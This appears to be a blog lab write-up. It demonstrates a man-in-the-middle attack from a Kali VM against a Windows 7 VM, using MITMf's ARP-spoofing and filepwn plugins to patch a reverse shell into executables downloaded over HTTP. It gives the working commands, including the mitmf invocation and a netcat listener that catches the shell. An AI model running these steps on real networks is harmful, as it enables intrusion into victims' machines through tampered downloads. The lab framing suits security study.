Check out Dan's rogue AP version of this attack, with BDFproxy using MACH-O backdoors.
MITMf by byt3bl33der has several modules that help in automating man in the middle attacks. This lab demonstrates the filepwn plugin being used in conjunction with the arp spoofing plugin to intercept executables being downloaded over http and patch our payload into them.
MITMf by byt3bl33der has several modules that help in automating man in the middle attacks. This lab demonstrates the filepwn plugin being used in conjunction with the arp spoofing plugin to intercept executables being downloaded over http and patch our payload into them.
We'll be arp poisoning a virtual instance of Windows 7 with a Kali VM, and patching a reverse shell into an executable downloaded from an unsecured http site using internet explorer.
On the Windows 7 machine:
Run CMD, then ipconfig
--Take note of your gateway and IP address
On the Kali Machine:
Edit your sources.list ---> nano /etc/apt/sources.list
Make sure your hosts file matches:
## Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
## Source repositories
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
##################################
--Back in terminal
apt-get install mitmf
ifconfig
--Take note of your IP address
nano /usr/share/mitmf/config_files/filepwn.cfg
--Edit the host IP address to reflect your Kali linux host.
--Take note of the port number used for the callback on your Windows x32 reverse tcp shell (the binary we're working with is 32 bit, so port 6666 is default, and what I'm going with here.)
mitmf --arp --spoof --iface eth0 --host xxx.xxx.xxx.xxx --gateway yyy.yyy.yyy.yyy --target zzz.zzz.zzz.zzz --filepwn
--Plug in those numbers you took note of earlier
--In another terminal tab:
nc -l -p 6666
--Fill in the port value as the port you took note of from the filepwn.cfg file
Windows 7 Machine:
Open up internet explorer
Go to live.internals.com
Click an executable, preferably tcpview.exe
Save, then run it
--Check your kali host for a shell back to your netcat instance
No netcat? go to your windows host and run tcpview and look for an outbound connection to your local network. Is the IP and port it's connecting to not your kali instance? Correct it in pwnfile.cfg.
Some caveats:
Windows will warn you about running these modified binaries because backdoor factory strips the pe header, so there's no signature on it. There are ways around this but that's outside the scope of this writeup.
Also, remember the victim AV is off
Special thanks to Dan (http://lockboxx.blogspot.com/) for all the help
Thank you byt3bl33d3r, and secretsquirrel for all of your hard work developing these tools
References:
https://github.com/byt3bl33d3r/MITMf
No comments:
Post a Comment